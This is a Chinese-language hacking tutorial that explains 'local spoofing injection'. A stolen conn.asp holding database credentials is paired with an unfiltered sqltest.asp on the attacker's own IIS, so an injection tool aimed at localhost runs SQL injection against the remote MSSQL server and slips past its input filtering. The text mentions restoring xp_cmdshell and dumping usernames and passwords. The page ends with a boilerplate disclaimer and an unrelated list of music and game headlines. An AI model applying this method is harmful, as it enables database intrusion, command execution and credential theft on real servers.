何为本地注射?简单地讲,就是本来你在服务器上无法进行SQL注入,因为服务器上的WEB程序很安全,对request("id")这样的请求过滤很严,或是限制输入格式为数字等等方法,你只能选择放弃放弃注入。
但是在有的时候,你可以在本机的IIS里进行注入,从而达到对服务器注射的目的,避过服务器的request参数提交过滤。举例子来说明吧,现在你误打误撞,利用暴库或是其他的漏洞,得到了服务器的conn.asp文件,那么恭喜你,入侵离成功不远了。
conn.asp文件代码一般如下:
<%
Set conn = Server.CreateObject("ADODB.Connection")
conn.Open "PROVIDER=SQLOLEDB;DATA SOURCE=61.121.140.37;UID=admin;pwd=12345;DATABASE=master"
%>
这里面记录的就是服务器的数据库的一些信息了,一般也会得到连接密码,说明是MSSQL的系统,非常好搞。如果服务器有URL可以进行SQL语句注射的话,恢复下XP_CMDshell,我们就能执行很多命令了,DOS命令也随便你。但是很可惜,我们不能注射,只有这么一个conn.asp文件可以利用。
那么,我们在本机来欺骗服务器,不过你要知道那个服务器采用的是什么web程序,不然你下面就不好写代码,我们来写一个sqltest.asp文件,在其中不做任何过滤,将这个文件和conn.asp一起放到你的IIS中的wwwroot下面,这样你就能通过Localhost来访问啦。
sqltest.asp代码如下:
<!--#include file="conn.asp"-->
<%
dim rs,strSQL,id
set rs=server.createobject("ADODB.recordset")
id = request("id")
strSQL ="select * from DVBBSmdb where GuestID=" & id
rs.open strSQL,conn,1,3
rs.close
%>
那个DVBBSmdb是我虚构的,大家要改成这个web程序的数据库的库名。看到没有,id的提交参数没有经过任何的过滤,没有用replace或是其他的函数。现在我们在啊D中输入注射URL:http://localhost/sqltest.asp?id=1。接着用啊D在本地服务器执行命令或是跑用户名和密码,就等同于在你要入侵的服务器上进行注射,绕过了它的防注入措施。
这就是本地欺骗注射,明白了吧?
免责声明:本站资源来自互联网收集,仅供用于学习和交流,请遵循相关法律法规,本站一切资源不代表本站立场,如有侵权、后门、不妥请联系本站删除!
更新日志
- 苏有朋.1994-珍惜的背包(第3张)【飞碟】【WAV+CUE】
- 《宝可梦:朱紫》“蓝之圆盘”IGN7分:性能优化仍旧灾难
- 《塞尔达传说:王国之泪》大获成功!多项年度数据表现优秀
- 应景!欧任用《塞尔达传说:王国之泪》堆雪人
- 杨采妮.1996-为所欲为(国专)【EMI百代】【WAV+CUE】
- 黎姿.1993-如果真的恋爱【华纳】【WAV+CUE】
- 朱婧汐.2024-VILLAIN反派角色【StreetVoic】【FLAC分轨】
- 《喷射战士3》最新祭典公布 1月13日举办
- NS日服年度下载榜公开:《王泪》不敌《西瓜游戏》
- 科乐美《心跳回忆GS》系列推出复刻版 2月14日登陆NS
- 林峰.2012-SELF-PORTRAIT【英皇娱乐】【WAV+CUE】
- TENSION.2004-Story新歌+精丫EMI百代】【FLAC分轨】
- 草蜢.2000-环球2000超巨星系列【环球】【WAV+CUE】
- 国行Switch开启元旦折扣!《马里奥奥德赛》7折促销
- 《塞尔达》官方账号感谢玩家支持 发布王泪最新壁纸